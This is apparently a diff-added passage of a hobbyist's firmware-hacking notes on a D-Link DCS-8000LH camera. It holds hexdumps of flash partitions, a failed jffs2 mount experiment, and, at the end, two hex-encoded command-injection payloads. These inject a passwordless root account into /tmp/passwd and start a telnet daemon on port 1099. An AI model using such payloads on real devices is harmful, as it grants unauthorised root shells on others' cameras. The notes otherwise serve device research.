+007e1f80  00 00 08 80 75 00 00 00  7d 00 00 00 82 1f 7e 00  |....u...}.....~.|
+007e1f90  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
+*
+007e2000
+
+
+bjorn@miraculix:/tmp/update2$ hexdump -C ~/docs/hardware/dlink/dcs8000lh/fw-2.02.02/mtd/mtd8 |tail -22
+007e1e80  bd 80 eb 69 d2 14 8c 15  2b b7 02 f7 9e dc f4 f6  |...i....+.......|
+007e1e90  5d fb b1 a5 64 4b 98 0a  40 68 c8 70 13 c7 52 55  |]...dK..@h.p..RU|
+007e1ea0  59 42 7e 72 f8 ab d8 c1  4e 7c 8b ea d5 65 aa 47  |YB~r....N|...e.G|
+007e1eb0  59 a4 b9 40 43 c1 6a f7  58 b3 cd bb 4e c1 68 26  |Y..@C.j.X...N.h&|
+007e1ec0  37 22 35 a0 05 19 42 3c  48 c0 08 95 89 19 51 9d  |7"5...B<H.....Q.|
+007e1ed0  e6 d8 87 4c c5 39 ef e7  6e ad fb 24 ca b1 1b 5f  |...L.9..n..$..._|
+007e1ee0  b3 c9 e4 c3 c3 d3 b0 a3  43 48 e6 26 e1 80 ad f9  |........CH.&....|
+007e1ef0  95 38 36 dd 1a b4 ab 59  03 ee e3 1e 9b f5 64 43  |.86....Y......dC|
+007e1f00  ce 44 1c 20 6e e7 77 23  ed 20 9c 90 4b 00 d5 01  |.D. n.w#. ..K...|
+007e1f10  1e 1c dd c4 7b 96 f2 1d  47 ae 2e e0 5c 51 6c 54  |....{...G...\QlT|
+007e1f20  9b e7 92 66 5e 33 98 00  e0 79 b9 3c f8 01 38 d5  |...f^3...y.<..8.|
+007e1f30  82 1b 11 48 66 be 0a 7c  b7 19 c3 7c 0d be 91 27  |...Hf..|...|...'|
+007e1f40  95 32 0b 13 78 6a 49 dd  f6 f4 a1 3f e3 00 a1 63  |.2..xjI....?...c|
+007e1f50  86 16 00 01 84 02 88 06  00 00 15 33 d4 10 3e 30  |...........3..>0|
+007e1f60  0d 8b 02 00 00 00 00 01  59 5a 08 0d 7e 00 00 00  |........YZ..~...|
+007e1f70  00 00 d2 15 7e 00 00 00  00 00 40 1e 7e 00 00 00  |....~.....@.~...|
+007e1f80  00 00 08 80 75 00 00 00  7d 00 00 00 82 1f 7e 00  |....u...}.....~.|
+007e1f90  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
+*
+007e2000  ff ff ff ff ff ff ff ff  ff ff ff ff ff ff ff ff  |................|
+*
+00b00000
+```
+
+Experiment:
+
+```
+# flash_erase -j /dev/mtd4 0 2
+Erasing 64 Kibyte @ 0 --  0 % complete flash_erase:  Cleanmarker written at 0
+Erasing 64 Kibyte @ 10000 -- 50 % complete flash_erase:  Cleanmarker written at 10000
+Erasing 64 Kibyte @ 10000 -- 100 % complete 
+
+# mount -t jffs2 /dev/mtdblock4 /mnt
+mount: mounting /dev/mtdblock4 on /mnt failed: Invalid argument
+# dmesg|tail
+rtk_btcoex: update_profile_connection: btrtl_coex.profile_refcount[6] = 0
+rtk_btcoex: update_profile_connection: btrtl_coex.profile_refcount[7] = 0
+rtk_btcoex: rtk_notify_profileinfo_to_fw: BufferSize 2
+rtk_btcoex: rtk_notify_profileinfo_to_fw: NumberOfHandles 0
+rtk_btcoex: rtk_notify_profileinfo_to_fw: profile_status 0x00
+rtk_btcoex: rtk_vendor_cmd_to_fw: opcode 0xfc19
+rtk_btusb: hci0 evt 2
+rtk_btusb: btusb_notify : hci0 evt 2
+jffs2: Too few erase blocks (2)
+jffs2: Too few erase blocks (2)
+
+```
+
+
+
+
+THIS WORKED:
+
+bjorn@miraculix:/tmp/update2$ perl -e 'print unpack("(H2 )*", shift),"\n"' 'P=123947;N=123947&&(echo "gg::0:0::/:/bin/sh">>/tmp/passwd)&'
+503d3132333934373b4e3d3132333934372626286563686f202267673a3a303a303a3a2f3a2f62696e2f7368223e3e2f746d702f7061737377642926
+
+
+bjorn@miraculix:/tmp/update2$ perl -e 'print unpack("(H2 )*", shift),"\n"' 'P=123947;N=123947&&(telnetd -p 1099)&'
+503d3132333934373b4e3d31323339343726262874656c6e657464202d7020313039392926